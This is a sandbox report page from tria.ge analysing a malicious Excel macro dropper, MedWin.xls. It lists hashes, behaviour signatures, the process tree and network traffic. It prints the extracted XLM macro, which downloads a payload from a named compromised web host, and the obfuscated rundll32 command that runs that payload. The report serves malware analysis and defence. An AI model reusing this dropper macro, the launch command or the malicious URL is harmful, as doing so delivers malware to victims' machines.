Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

MedWin.xls

windows7-x64

10

MedWin.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 21:46 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MedWin.xls

  • Size

    104KB

  • MD5

    9f2a3f3ff7c400069f011102ba88560f

  • SHA1

    7cd0d84516db5b598549df82f4a427dd32cd3e1d

  • SHA256

    f79f56d7a2467d6f73e634be22ac623ee658aa9778b34f23913f9749a2fdd26c

  • SHA512

    80dc9955db7fd513db41d05f33ae4a2b713029a649d71ae01d2f1486d12af2a604525e920cd7ab22002b83833aa4322e16eca16dceffaacc0dd25569bf77f46c

  • SSDEEP

    3072:yWKpbdrHYrMue8q7QPX+5xtekEdi8/dgeJ0depMHwGGqd4Mk:nKpbdrHYrMue8q7QPX+5xtFEdi8/dgeN

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://filecabinet.digitalechoes.co.uk/wp-admin/NC/", "..\iix.ocx")
URLs
xlm40.dropper

http://filecabinet.digitalechoes.co.uk/wp-admin/NC/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\MedWin.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4832
    • C:\Windows\SysWow64\rundll32.exe
      C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:116

Network

  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    96.136.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    96.136.73.23.in-addr.arpa
    IN PTR
    Response
    96.136.73.23.in-addr.arpa
    IN PTR
    a23-73-136-96deploystaticakamaitechnologiescom
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    frc-azsc-000.roaming.officeapps.live.com
    frc-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com
    osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com
    IN A
    52.109.68.129
  • flag-fr
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.68.129:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_79
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: frc-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-UsoGEA5SAbeYOXMX2W5JrLZWafVKpJHgI4tgbe+nfz09LOOE9qnAdT3edTqz/iLtoiEWGBJQhxmkRYTlVAYlmEbWaBbynnoIa42K/rCXIKAMa/7l/DQcyHqih1gXAcU1aUSC4V8ZKRmvFOrZLTiJoCIBqM9EGgKqvvV39wZXb80=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: cd592550-f1ee-43db-98f1-73331f209b19
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 21:46:16 GMT
    Content-Length: 654
  • flag-us
    DNS
    filecabinet.digitalechoes.co.uk
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    filecabinet.digitalechoes.co.uk
    IN A
    Response
    filecabinet.digitalechoes.co.uk
    IN A
    217.160.0.100
  • flag-de
    GET
    http://filecabinet.digitalechoes.co.uk/wp-admin/NC/
    EXCEL.EXE
    Remote address:
    217.160.0.100:80
    Request
    GET /wp-admin/NC/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: filecabinet.digitalechoes.co.uk
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=15
    Date: Wed, 20 Nov 2024 21:46:17 GMT
    Server: Apache
    X-Powered-By: PHP/7.4.33
    Content-Encoding: gzip
  • flag-us
    DNS
    129.68.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    129.68.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    102.209.201.84.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    102.209.201.84.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    97.32.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.32.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    100.0.160.217.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    100.0.160.217.in-addr.arpa
    IN PTR
    Response
    100.0.160.217.in-addr.arpa
    IN PTR
    217-160-0-100 elastic-sslui-rcom
  • flag-us
    DNS
    68.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    145.136.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    145.136.73.23.in-addr.arpa
    IN PTR
    Response
    145.136.73.23.in-addr.arpa
    IN PTR
    a23-73-136-145deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.68.129:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    1.8kB
     8.2kB
     12
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 217.160.0.100:80
    http://filecabinet.digitalechoes.co.uk/wp-admin/NC/
    http
    EXCEL.EXE
    875 B
     441 B
     12
    4

    HTTP Request

    GET http://filecabinet.digitalechoes.co.uk/wp-admin/NC/

    HTTP Response

    200
  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    96.136.73.23.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    96.136.73.23.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
     250 B
     1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.68.129

  • 8.8.8.8:53
    filecabinet.digitalechoes.co.uk
    dns
    EXCEL.EXE
    77 B
     93 B
     1
    1

    DNS Request

    filecabinet.digitalechoes.co.uk

    DNS Response

    217.160.0.100

  • 8.8.8.8:53
    129.68.109.52.in-addr.arpa
    dns
    145 B
     279 B
     2
    2

    DNS Request

    129.68.109.52.in-addr.arpa

    DNS Request

    102.209.201.84.in-addr.arpa

  • 8.8.8.8:53
    97.32.109.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    97.32.109.52.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    100.0.160.217.in-addr.arpa
    dns
    72 B
     120 B
     1
    1

    DNS Request

    100.0.160.217.in-addr.arpa

  • 8.8.8.8:53
    68.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    68.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    11.173.189.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    145.136.73.23.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    145.136.73.23.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    30.243.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    30.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize

    3KB

    MD5

    9fc8f7a6e020e88d7dad5185a00687ec

    SHA1

    f272b16c03a0c18e131ce87cc9227b924580186b

    SHA256

    23d175430f25df4e02f686df7e2fd8e87d6f3888ebca6c8a0f547235a91cd035

    SHA512

    76eeff189e1c267d54be0154a265d1575b0b7460c27c3deba79932eb514ec6369788890852a5e935bbc0f07519e9d58e1aa84284f41d960f6b89c6858a1b503b

    Download Submit

  • memory/4832-5-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4832-31-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-2-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4832-4-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4832-8-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-7-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-9-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-6-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-10-0x00007FFED2800000-0x00007FFED2810000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4832-11-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-12-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-0-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4832-3-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4832-15-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-13-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-18-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-19-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-20-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-21-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-17-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-16-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-14-0x00007FFED2800000-0x00007FFED2810000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4832-32-0x00007FFF1506D000-0x00007FFF1506E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4832-36-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4832-1-0x00007FFF1506D000-0x00007FFF1506E000-memory.dmp

    Filesize

    4KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.